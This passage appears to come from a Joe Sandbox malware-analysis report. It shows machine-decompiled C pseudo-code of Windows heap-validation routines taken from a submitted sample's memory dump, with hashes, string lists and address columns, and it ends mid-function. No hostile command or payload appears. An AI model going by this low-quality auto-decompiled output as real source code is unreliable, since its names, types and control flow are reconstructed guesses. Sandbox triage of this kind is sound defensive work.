                                                        • Opcode ID: 91d2694cad288200ba3d268ac476401d39f69390d58fa4d7b39e986520840483
                                                        • Instruction ID: 3f8c12542f8d999cb1f4d41a8fdb1617efbca71a7f86267c00dcbdb7b74146ca
                                                        • Opcode Fuzzy Hash: 91d2694cad288200ba3d268ac476401d39f69390d58fa4d7b39e986520840483
                                                        • Instruction Fuzzy Hash: 3F61843651614ADFE222AB4AD4DD925F7F4E704B70F89807EF50A9F301DA34DA408F5A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018A4AEF Relevance: 11.8, Strings: 9, Instructions: 529COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 59%
                                                        			E018A4AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t189;
				intOrPtr _t191;
				intOrPtr _t210;
				signed int _t225;
				signed char _t231;
				intOrPtr _t232;
				unsigned int _t245;
				intOrPtr _t249;
				intOrPtr _t259;
				signed int _t281;
				signed int _t283;
				intOrPtr _t284;
				signed int _t288;
				signed int* _t294;
				signed int* _t298;
				intOrPtr* _t299;
				intOrPtr* _t300;
				signed int _t307;
				signed int _t309;
				signed short _t312;
				signed short _t315;
				signed int _t317;
				signed int _t320;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t328;
				signed int _t332;
				signed int _t340;
				signed int _t342;
				signed char _t344;
				signed int* _t345;
				void* _t346;
				signed char _t352;
				signed char _t367;
				signed int _t374;
				intOrPtr* _t378;
				signed int _t380;
				signed int _t385;
				signed char _t390;
				unsigned int _t392;
				signed char _t395;
				unsigned int _t397;
				intOrPtr* _t400;
				signed int _t402;
				signed int _t405;
				intOrPtr* _t406;
				signed int _t407;
				intOrPtr _t412;
				void* _t414;
				signed int _t415;
				signed int _t416;
				signed int _t429;

				_v16 = _v16 & 0x00000000;
				_t189 = 0;
				_v8 = _v8 & 0;
				_t332 = __edx;
				_v12 = 0;
				_t414 = __ecx;
				_t415 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t416 = _v16;
					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
							L107:
							return 1;
						}
						_t191 =  *[fs:0x30];
						__eflags =  *(_t191 + 0xc);
						if( *(_t191 + 0xc) == 0) {
							_push("HEAP: ");
							E017EB150();
						} else {
							E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t332 + 0x30)));
						_push(_t332);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E017EB150();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E017EB150();
					} else {
						E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t416);
					_push( *((intOrPtr*)(_t332 + 0x2c)));
					_push(_t332);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t415;
					if( *(_t414 + 0x4c) != 0) {
						_t392 =  *(_t414 + 0x50) ^  *_t415;
						 *_t415 = _t392;
						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
						_t424 = _t392 >> 0x18 - _t352;
						if(_t392 >> 0x18 != _t352) {
							_push(_t352);
							E0189FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
						}
					}
					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
						_t210 =  *[fs:0x30];
						__eflags =  *(_t210 + 0xc);
						if( *(_t210 + 0xc) == 0) {
							_push("HEAP: ");
							E017EB150();
						} else {
							E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
						__eflags = _t340;
						_push(_t340);
						E017EB150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
						L117:
						__eflags =  *(_t414 + 0x4c);
						if( *(_t414 + 0x4c) != 0) {
							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
							__eflags =  *_t415;
						}
						goto L119;
					}
					_t225 =  *_t415 & 0x0000ffff;
					_t390 =  *(_t415 + 2);
					_t342 = _t225;
					_v8 = _t342;
					_v20 = _t342;
					_v28 = _t225 << 3;
					if((_t390 & 0x00000001) == 0) {
						__eflags =  *(_t414 + 0x40) & 0x00000040;
						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
						__eflags = _t344 & 0x00000001;
						if((_t344 & 0x00000001) == 0) {
							L66:
							_t345 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
							__eflags =  *_t345;
							L67:
							_t231 =  *(_t415 + 6);
							if(_t231 == 0) {
								_t346 = _t414;
							} else {
								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t346 != _t332) {
								_t232 =  *[fs:0x30];
								__eflags =  *(_t232 + 0xc);
								if( *(_t232 + 0xc) == 0) {
									_push("HEAP: ");
									E017EB150();
								} else {
									E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t415 + 6) & 0x000000ff);
								_push(_t415);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t415 + 7)) != 3) {
									__eflags =  *(_t414 + 0x4c);
									if( *(_t414 + 0x4c) != 0) {
										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										__eflags =  *_t415;
									}
									_t415 = _t415 + _v28;
									__eflags = _t415;
									goto L86;
								}
								_t245 =  *(_t415 + 0x1c);
								if(_t245 == 0) {
									_t395 =  *_t415 & 0x0000ffff;
									_v6 = _t395 >> 8;
									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
										__eflags =  *(_t414 + 0x4c);
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											__eflags =  *_t415;
										}
										goto L107;
									}
									_t249 =  *[fs:0x30];
									__eflags =  *(_t249 + 0xc);
									if( *(_t249 + 0xc) == 0) {
										_push("HEAP: ");
										E017EB150();
									} else {
										E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t332 + 0x28)));
									_push(_t415);
									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E017EB150();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t245 >> 0xc);
								if( *(_t414 + 0x4c) != 0) {
									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
								}
								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t414 + 0x4c) != 0) {
										_t397 =  *(_t414 + 0x50) ^  *_t415;
										 *_t415 = _t397;
										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
										_t442 = _t397 >> 0x18 - _t367;
										if(_t397 >> 0x18 != _t367) {
											_push(_t367);
											E0189FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
										}
									}
									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
										_t259 =  *[fs:0x30];
										__eflags =  *(_t259 + 0xc);
										if( *(_t259 + 0xc) == 0) {
											_push("HEAP: ");
											E017EB150();
										} else {
											E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
										_push(_t415);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t281 = _v28 + 0xfffffff0;
						_v24 = _t281;
						__eflags = _t390 & 0x00000002;
						if((_t390 & 0x00000002) != 0) {
							__eflags = _t281 - 4;
							if(_t281 > 4) {
								_t281 = _t281 - 4;
								__eflags = _t281;
								_v24 = _t281;
							}
						}
						__eflags = _t390 & 0x00000008;
						if((_t390 & 0x00000008) == 0) {
							_t102 = _t415 + 0x10; // -8
							_t283 = E0183D540(_t102, _t281, 0xfeeefeee);
							_v20 = _t283;
							__eflags = _t283 - _v24;
							if(_t283 != _v24) {
								_t284 =  *[fs:0x30];
								__eflags =  *(_t284 + 0xc);
								if( *(_t284 + 0xc) == 0) {
									_push("HEAP: ");
									E017EB150();
								} else {
									E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t288 = _v20 + 8 + _t415;
								__eflags = _t288;
								_push(_t288);
								_push(_t415);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t374 =  *(_t415 + 8);
							_t400 =  *((intOrPtr*)(_t415 + 0xc));
							_v24 = _t374;
							_v28 = _t400;
							_t294 =  *(_t374 + 4);
							__eflags =  *_t400 - _t294;
							if( *_t400 != _t294) {
								L64:
								_push(_t374);
								_push( *_t400);
								_t101 = _t415 + 8; // -16
								E018AA80D(_t414, 0xd, _t101, _t294);
								goto L86;
							}
							_t56 = _t415 + 8; // -16
							__eflags =  *_t400 - _t56;
							_t374 = _v24;
							if( *_t400 != _t56) {
								goto L64;
							}
							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
							_t402 =  *(_t414 + 0xb4);
							__eflags = _t402;
							if(_t402 == 0) {
								L35:
								_t298 = _v28;
								 *_t298 = _t374;
								 *(_t374 + 4) = _t298;
								__eflags =  *(_t415 + 2) & 0x00000008;
								if(( *(_t415 + 2) & 0x00000008) == 0) {
									L39:
									_t377 =  *_t415 & 0x0000ffff;
									_t299 = _t414 + 0xc0;
									_v28 =  *_t415 & 0x0000ffff;
									 *(_t415 + 2) = 0;
									 *((char*)(_t415 + 7)) = 0;
									__eflags =  *(_t414 + 0xb4);
									if( *(_t414 + 0xb4) == 0) {
										_t378 =  *_t299;
									} else {
										_t378 = E0180E12C(_t414, _t377);
										_t299 = _t414 + 0xc0;
									}
									__eflags = _t299 - _t378;
									if(_t299 == _t378) {
										L51:
										_t300 =  *((intOrPtr*)(_t378 + 4));
										__eflags =  *_t300 - _t378;
										if( *_t300 != _t378) {
											_push(_t378);
											_push( *_t300);
											__eflags = 0;
											E018AA80D(0, 0xd, _t378, 0);
										} else {
											_t87 = _t415 + 8; // -16
											_t406 = _t87;
											 *_t406 = _t378;
											 *((intOrPtr*)(_t406 + 4)) = _t300;
											 *_t300 = _t406;
											 *((intOrPtr*)(_t378 + 4)) = _t406;
										}
										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
										_t405 =  *(_t414 + 0xb4);
										__eflags = _t405;
										if(_t405 == 0) {
											L61:
											__eflags =  *(_t414 + 0x4c);
											if(__eflags != 0) {
												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											}
											goto L86;
										} else {
											_t380 =  *_t415 & 0x0000ffff;
											while(1) {
												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
													break;
												}
												_t307 =  *_t405;
												__eflags = _t307;
												if(_t307 == 0) {
													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
													L60:
													_t94 = _t415 + 8; // -16
													E0180E4A0(_t414, _t405, 1, _t94, _t309, _t380);
													goto L61;
												}
												_t405 = _t307;
											}
											_t309 = _t380;
											goto L60;
										}
									} else {
										_t407 =  *(_t414 + 0x4c);
										while(1) {
											__eflags = _t407;
											if(_t407 == 0) {
												_t312 =  *(_t378 - 8) & 0x0000ffff;
											} else {
												_t315 =  *(_t378 - 8);
												_t407 =  *(_t414 + 0x4c);
												__eflags = _t315 & _t407;
												if((_t315 & _t407) != 0) {
													_t315 = _t315 ^  *(_t414 + 0x50);
													__eflags = _t315;
												}
												_t312 = _t315 & 0x0000ffff;
											}
											__eflags = _v28 - (_t312 & 0x0000ffff);
											if(_v28 <= (_t312 & 0x0000ffff)) {
												goto L51;
											}
											_t378 =  *_t378;
											__eflags = _t414 + 0xc0 - _t378;
											if(_t414 + 0xc0 != _t378) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t317 = E0180A229(_t414, _t415);
								__eflags = _t317;
								if(_t317 != 0) {
									goto L39;
								}
								E0180A309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
								goto L86;
							}
							_t385 =  *_t415 & 0x0000ffff;
							while(1) {
								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
									break;
								}
								_t320 =  *_t402;
								__eflags = _t320;
								if(_t320 == 0) {
									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
									L34:
									_t63 = _t415 + 8; // -16
									E0180BC04(_t414, _t402, 1, _t63, _t322, _t385);
									_t374 = _v24;
									goto L35;
								}
								_t402 = _t320;
							}
							_t322 = _t385;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t415 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E018923E3(_t414, _t415) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t390 & 0x00000002) == 0) {
							_t326 =  *(_t415 + 3) & 0x000000ff;
						} else {
							_t328 = E017E1F5B(_t415);
							_t342 = _v20;
							_t326 =  *(_t328 + 2) & 0x0000ffff;
						}
						_t429 = _t326;
						if(_t429 == 0) {
							goto L18;
						}
						if(_t429 >= 0) {
							__eflags = _t326 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
							_t412 = _a20;
							_t327 = _t326 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
							goto L18;
						}
						_t327 = _t326 & 0x00007fff;
						if(_t327 >= 0x81) {
							goto L18;
						}
						_t412 = _a24;
						goto L17;
					}
					L86:
				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
				_t189 = _v12;
				goto L88;
			}



































































                                                        0x018a4af7
                                                        0x018a4afb
                                                        0x018a4afd
                                                        0x018a4b01
                                                        0x018a4b03
                                                        0x018a4b08
                                                        0x018a4b0a
                                                        0x018a4b0f
                                                        0x018a4eb5
                                                        0x018a4eb5
                                                        0x018a4ebb
                                                        0x018a50d5
                                                        0x018a50d8
                                                        0x018a4ff6
                                                        0x00000000
                                                        0x018a4ff6
                                                        0x018a50de
                                                        0x018a50e4
                                                        0x018a50e8
                                                        0x018a5107
                                                        0x018a510c
                                                        0x018a50ea
                                                        0x018a50ff
                                                        0x018a5104
                                                        0x018a5112
                                                        0x018a5115
                                                        0x018a5118
                                                        0x018a5119
                                                        0x018a50cb
                                                        0x018a50cb
                                                        0x018a50af
                                                        0x00000000
                                                        0x018a50af
                                                        0x018a4ecb
                                                        0x018a50b6
                                                        0x018a50bb
                                                        0x018a4ed1
                                                        0x018a4ee6
                                                        0x018a4eeb
                                                        0x018a50c1
                                                        0x018a50c2
                                                        0x018a50c5
                                                        0x018a50c6
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x018a4b15
                                                        0x018a4b15
                                                        0x018a4b1c
                                                        0x018a4b1e
                                                        0x018a4b23
                                                        0x018a4b27
                                                        0x018a4b33
                                                        0x018a4b38
                                                        0x018a4b3a
                                                        0x018a4b3c
                                                        0x018a4b41
                                                        0x018a4b41
                                                        0x018a4b3a
                                                        0x018a4b52
                                                        0x018a5045
                                                        0x018a504b
                                                        0x018a504f
                                                        0x018a506e
                                                        0x018a5073
                                                        0x018a5051
                                                        0x018a5066
                                                        0x018a506b
                                                        0x018a5083
                                                        0x018a5088
                                                        0x018a5088
                                                        0x018a508a
                                                        0x018a5091
                                                        0x018a5099
                                                        0x018a5099
                                                        0x018a509d
                                                        0x018a50a7
                                                        0x018a50ad
                                                        0x018a50ad
                                                        0x018a50ad
                                                        0x00000000
                                                        0x018a509d
                                                        0x018a4b58
                                                        0x018a4b5b
                                                        0x018a4b5e
                                                        0x018a4b63
                                                        0x018a4b66
                                                        0x018a4b69
                                                        0x018a4b6f
                                                        0x018a4be4
                                                        0x018a4bf0
                                                        0x018a4bf2
                                                        0x018a4bf5
                                                        0x018a4dc3
                                                        0x018a4dc6
                                                        0x018a4dc9
                                                        0x018a4dce
                                                        0x018a4dce
                                                        0x018a4dd0
                                                        0x018a4dd0
                                                        0x018a4dd5
                                                        0x018a4def
                                                        0x018a4dd7
                                                        0x018a4de7
                                                        0x018a4de7
                                                        0x018a4df3
                                                        0x018a5001
                                                        0x018a5007
                                                        0x018a500b
                                                        0x018a502a
                                                        0x018a502f
                                                        0x018a500d
                                                        0x018a5022
                                                        0x018a5027
                                                        0x018a5039
                                                        0x018a503a
                                                        0x018a503b
                                                        0x00000000
                                                        0x018a4df9
                                                        0x018a4dfd
                                                        0x018a4e90
                                                        0x018a4e94
                                                        0x018a4e9e
                                                        0x018a4ea4
                                                        0x018a4ea4
                                                        0x018a4ea4
                                                        0x018a4ea6
                                                        0x018a4ea6
                                                        0x00000000
                                                        0x018a4ea6
                                                        0x018a4e03
                                                        0x018a4e08
                                                        0x018a4f88
                                                        0x018a4f92
                                                        0x018a4f99
                                                        0x018a4f9c
                                                        0x018a4fe0
                                                        0x018a4fe4
                                                        0x018a4fee
                                                        0x018a4ff4
                                                        0x018a4ff4
                                                        0x018a4ff4
                                                        0x00000000
                                                        0x018a4fe4
                                                        0x018a4f9e
                                                        0x018a4fa4
                                                        0x018a4fa8
                                                        0x018a4fc7
                                                        0x018a4fcc
                                                        0x018a4faa
                                                        0x018a4fbf
                                                        0x018a4fc4
                                                        0x018a4fd2
                                                        0x018a4fd5
                                                        0x018a4fd6
                                                        0x018a4f34
                                                        0x018a4f34
                                                        0x00000000
                                                        0x018a4f39
                                                        0x018a4e0e
                                                        0x018a4e14
                                                        0x018a4e1b
                                                        0x018a4e25
                                                        0x018a4e2b
                                                        0x018a4e2b
                                                        0x018a4e33
                                                        0x018a4e38
                                                        0x018a4e8a
                                                        0x018a4e8a
                                                        0x00000000
                                                        0x018a4e3a
                                                        0x018a4e3e
                                                        0x018a4e43
                                                        0x018a4e47
                                                        0x018a4e53
                                                        0x018a4e58
                                                        0x018a4e5a
                                                        0x018a4e5c
                                                        0x018a4e61
                                                        0x018a4e61
                                                        0x018a4e5a
                                                        0x018a4e6e
                                                        0x018a4f41
                                                        0x018a4f47
                                                        0x018a4f4b
                                                        0x018a4f6a
                                                        0x018a4f6f
                                                        0x018a4f4d
                                                        0x018a4f62
                                                        0x018a4f67
                                                        0x018a4f7f
                                                        0x018a4f80
                                                        0x018a4f81
                                                        0x00000000
                                                        0x018a4e74
                                                        0x018a4e78
                                                        0x018a4e82
                                                        0x018a4e88
                                                        0x018a4e88
                                                        0x00000000
                                                        0x018a4e78
                                                        0x018a4e6e
                                                        0x018a4e38
                                                        0x018a4df3
                                                        0x018a4bfe
                                                        0x018a4c01
                                                        0x018a4c04
                                                        0x018a4c07
                                                        0x018a4c09
                                                        0x018a4c0c
                                                        0x018a4c0e
                                                        0x018a4c0e
                                                        0x018a4c11
                                                        0x018a4c11
                                                        0x018a4c0c
                                                        0x018a4c14
                                                        0x018a4c17
                                                        0x018a4dae
                                                        0x018a4db2
                                                        0x018a4db7
                                                        0x018a4dba
                                                        0x018a4dbd
                                                        0x018a4ef1
                                                        0x018a4ef7
                                                        0x018a4efb
                                                        0x018a4f1a
                                                        0x018a4f1f
                                                        0x018a4efd
                                                        0x018a4f12
                                                        0x018a4f17
                                                        0x018a4f2b
                                                        0x018a4f2b
                                                        0x018a4f2d
                                                        0x018a4f2e
                                                        0x018a4f2f
                                                        0x00000000
                                                        0x018a4f2f
                                                        0x00000000
                                                        0x018a4c1d
                                                        0x018a4c1d
                                                        0x018a4c20
                                                        0x018a4c23
                                                        0x018a4c26
                                                        0x018a4c29
                                                        0x018a4c2c
                                                        0x018a4c2e
                                                        0x018a4d91
                                                        0x018a4d91
                                                        0x018a4d92
                                                        0x018a4d97
                                                        0x018a4d9e
                                                        0x00000000
                                                        0x018a4d9e
                                                        0x018a4c34
                                                        0x018a4c37
                                                        0x018a4c39
                                                        0x018a4c3c
                                                        0x00000000
                                                        0x00000000
                                                        0x018a4c45
                                                        0x018a4c48
                                                        0x018a4c4e
                                                        0x018a4c50
                                                        0x018a4c78
                                                        0x018a4c78
                                                        0x018a4c7b
                                                        0x018a4c7d
                                                        0x018a4c80
                                                        0x018a4c84
                                                        0x018a4cad
                                                        0x018a4cad
                                                        0x018a4cb0
                                                        0x018a4cb8
                                                        0x018a4cbb
                                                        0x018a4cbe
                                                        0x018a4cc1
                                                        0x018a4cc7
                                                        0x018a4cdc
                                                        0x018a4cc9
                                                        0x018a4cd2
                                                        0x018a4cd4
                                                        0x018a4cd4
                                                        0x018a4cde
                                                        0x018a4ce0
                                                        0x018a4d13
                                                        0x018a4d13
                                                        0x018a4d16
                                                        0x018a4d18
                                                        0x018a4d29
                                                        0x018a4d2a
                                                        0x018a4d2c
                                                        0x018a4d34
                                                        0x018a4d1a
                                                        0x018a4d1a
                                                        0x018a4d1a
                                                        0x018a4d1d
                                                        0x018a4d1f
                                                        0x018a4d22
                                                        0x018a4d24
                                                        0x018a4d24
                                                        0x018a4d3c
                                                        0x018a4d3f
                                                        0x018a4d45
                                                        0x018a4d47
                                                        0x018a4d6c
                                                        0x018a4d6c
                                                        0x018a4d70
                                                        0x018a4d7e
                                                        0x018a4d84
                                                        0x018a4d84
                                                        0x00000000
                                                        0x018a4d49
                                                        0x018a4d49
                                                        0x018a4d56
                                                        0x018a4d56
                                                        0x018a4d59
                                                        0x00000000
                                                        0x00000000
                                                        0x018a4d4e
                                                        0x018a4d50
                                                        0x018a4d52
                                                        0x018a4d8e
                                                        0x018a4d5d
                                                        0x018a4d5f
                                                        0x018a4d67
                                                        0x00000000
                                                        0x018a4d67
                                                        0x018a4d54
                                                        0x018a4d54
                                                        0x018a4d5b
                                                        0x00000000
                                                        0x018a4d5b
                                                        0x018a4ce2
                                                        0x018a4ce2
                                                        0x018a4ce5
                                                        0x018a4ce5
                                                        0x018a4ce7
                                                        0x018a4cfb
                                                        0x018a4ce9
                                                        0x018a4ce9
                                                        0x018a4cec
                                                        0x018a4cef
                                                        0x018a4cf1
                                                        0x018a4cf3
                                                        0x018a4cf3
                                                        0x018a4cf3
                                                        0x018a4cf6
                                                        0x018a4cf6
                                                        0x018a4d02
                                                        0x018a4d05
                                                        0x00000000
                                                        0x00000000
                                                        0x018a4d07
                                                        0x018a4d0f
                                                        0x018a4d11
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x018a4d11
                                                        0x00000000
                                                        0x018a4ce5
                                                        0x018a4ce0
                                                        0x018a4c8a
                                                        0x018a4c8f
                                                        0x018a4c91
                                                        0x00000000
                                                        0x00000000
                                                        0x018a4c9d
                                                        0x00000000
                                                        0x018a4c9d
                                                        0x018a4c52
                                                        0x018a4c5f
                                                        0x018a4c5f
                                                        0x018a4c62
                                                        0x00000000
                                                        0x00000000
                                                        0x018a4c57
                                                        0x018a4c59
                                                        0x018a4c5b
                                                        0x018a4caa
                                                        0x018a4c66
                                                        0x018a4c68
                                                        0x018a4c70
                                                        0x018a4c75
                                                        0x00000000
                                                        0x018a4c75
                                                        0x018a4c5d
                                                        0x018a4c5d
                                                        0x018a4c64
                                                        0x00000000
                                                        0x018a4c64
                                                        0x018a4c17
                                                        0x018a4b75
                                                        0x018a4bc4
                                                        0x018a4bc8
                                                        0x00000000
                                                        0x00000000
                                                        0x018a4bd9
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x018a4b77
                                                        0x018a4b7a
                                                        0x018a4b8c
                                                        0x018a4b7c
                                                        0x018a4b7e
                                                        0x018a4b83
                                                        0x018a4b86
                                                        0x018a4b86
                                                        0x018a4b90
                                                        0x018a4b93
                                                        0x00000000
                                                        0x00000000
                                                        0x018a4b95
                                                        0x018a4bab
                                                        0x018a4bb0
                                                        0x00000000
                                                        0x00000000
                                                        0x018a4bb2
                                                        0x018a4bb9
                                                        0x00000000
                                                        0x00000000
                                                        0x018a4bbb
                                                        0x018a4bbe
                                                        0x018a4bc1
                                                        0x018a4bc1
                                                        0x00000000
                                                        0x018a4bc1
                                                        0x018a4b97
                                                        0x018a4ba4
                                                        0x00000000
                                                        0x00000000
                                                        0x018a4ba6
                                                        0x00000000
                                                        0x018a4ba6
                                                        0x018a4ea9
                                                        0x018a4ea9
                                                        0x018a4eb2
                                                        0x00000000

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                        • API String ID: 0-3591852110
                                                        • Opcode ID: 725a5375e651b619603a19374bcee7d34cf1074faefad30b7f2f47cae5a947bf
                                                        • Instruction ID: 726996c905b350e5a0f767dc69e4c5cbd1550f77d69fa0cc6dd0a76803dbf2f5
                                                        • Opcode Fuzzy Hash: 725a5375e651b619603a19374bcee7d34cf1074faefad30b7f2f47cae5a947bf
                                                        • Instruction Fuzzy Hash: 8312F0302006469FEB25CF6DC498BBABBF1EF08714F58845DE586CB641D7B4EA81CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018A4496 Relevance: 10.4, Strings: 8, Instructions: 417COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 56%
                                                        			E018A4496(signed int* __ecx, void* __edx) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int* _v28;
				char _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t150;
				intOrPtr _t151;
				signed char _t156;
				intOrPtr _t157;
				unsigned int _t169;
				intOrPtr _t170;
				signed int* _t183;
				signed char _t184;
				intOrPtr _t191;
				signed int _t201;
				intOrPtr _t203;
				intOrPtr _t212;
				intOrPtr _t220;
				signed int _t230;
				signed int _t241;
				signed int _t244;
				void* _t259;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				signed int _t263;
				signed int* _t264;
				signed int _t267;
				signed int* _t268;
				void* _t270;
				void* _t281;
				signed short _t285;
				signed short _t289;
				signed int _t291;
				signed int _t298;
				signed char _t303;
				signed char _t308;
				signed int _t314;
				intOrPtr _t317;
				unsigned int _t319;
				signed int* _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr _t328;
				signed int _t329;
				signed int _t330;
				signed int* _t331;
				signed int _t332;
				signed int _t350;

				_t259 = __edx;
				_t331 = __ecx;
				_v28 = __ecx;
				_v20 = 0;
				_v12 = 0;
				_t150 = E018A49A4(__ecx);
				_t267 = 1;
				if(_t150 == 0) {
					L61:
					_t151 =  *[fs:0x30];
					__eflags =  *((char*)(_t151 + 2));
					if( *((char*)(_t151 + 2)) != 0) {
						 *0x18d6378 = _t267;
						asm("int3");
						 *0x18d6378 = 0;
					}
					__eflags = _v12;
					if(_v12 != 0) {
